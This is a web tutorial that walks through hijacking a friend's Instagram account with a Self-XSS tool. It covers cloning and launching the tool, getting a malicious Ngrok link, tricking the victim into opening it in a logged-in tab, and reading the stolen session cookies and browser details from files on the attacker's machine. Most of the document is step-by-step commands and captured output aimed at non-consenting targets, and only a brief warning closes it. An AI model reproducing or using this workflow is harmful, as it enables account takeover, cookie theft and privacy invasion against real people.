Hack Instagram of your friend and hijack his/her Instagram cookies


Do you know, its easy is to hack the Instagram account of your friend and hijack his or her Instagram cookies. This is one of the tricks used by hackers to steal your Instagram account. Whenever we logged into any website suppose Instagram, the Instagram server stores small piece code (also called web cookie) in our browsers. As commented by the researcher of the International Institute of Cyber Security, “If we are able to steal or Hijack these web cookies (we got after authenticating/logging on Instagram), we can log in to the Instagram account of that person“.

Today we will show, how easy is it to get the cookies of authenticated/logged user of a particular website that can be your friend or relative using the Self-XSS hacking tool. Self-XSS uses social engineering tool and using this hacker can gain control of the victims’ Instagram account.


  • OS: Kali Linux 2019.3 64 bit
  • Kernel version: 5.2.0

Installation Steps

root@kali:/home/iicybersecurity# git clone https://github.com/thelinuxchoice/self-xss
Cloning into 'self-xss'...
remote: Enumerating objects: 38, done.
remote: Counting objects: 100% (38/38), done.
remote: Compressing objects: 100% (37/37), done.
remote: Total 38 (delta 12), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (38/38), 12.79 KiB | 422.00 KiB/s, done.
  • Use the cd command to enter into self-xss directory
root@kali:/home/iicybersecurity# cd self-xss/
  • Now, use this command to launch the tool bash self-xss.sh
Self-XSS - Malicious code
Self-XSS – Malicious code
  • After Launching the tool, first we have to enter the website name whose account we want to hack. In our case, it will be https://instagram.com
  • Next, enter the Email and password details.
  • Then the tool will downloads the Ngrok server automatically and start the PHP server and Ngrok server.
  • Then it will give to malicious URL as we can see in the above picture.
  • Now, send this malicious code to the victim using social engineering tricks and ask the victim to open this link in the same Instagram Browser Tab.
Self-XSS - Malicious code Injected
Self-XSS – Malicious code Injected
  • The Malicious code will captures the Instagram cookies and IP Address details of the victim and sends back to the hacker.
  • Now go to hacker machine where self-XSS is running.
  • go to cd /home/iicybersecurity/self-xss
  • To verify, use the cat command to view the details of the cookies.
    • cat cookies.backup
root@kali:/home/iicybersecurity/self-xss# cat cookies.backup
mid=XsYGMQALAAFTsuFdOqBKpj1oAJs6; csrftoken=2Z8ovGnPCnaRccQ7Og2GlPLWBIAj4zFD; ds_user_id=29687340949
  • We go the Instagram cookies.
  • Now use cat command to view the IP and browser details .
    • cat saved.ip.txt
root@kali:/home/iicybersecurity/self-xss# cat saved.ip.txt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36

Here, we successfully got the victims IP address with Machine details and victim’s Instagram cookies.


Now, we saw how to find the cookies details of the victim using a self-XSS in combination with social engineering. So it is always recommended to never click on any suspicious link, and that too when you are logged into any social networking website or any other website.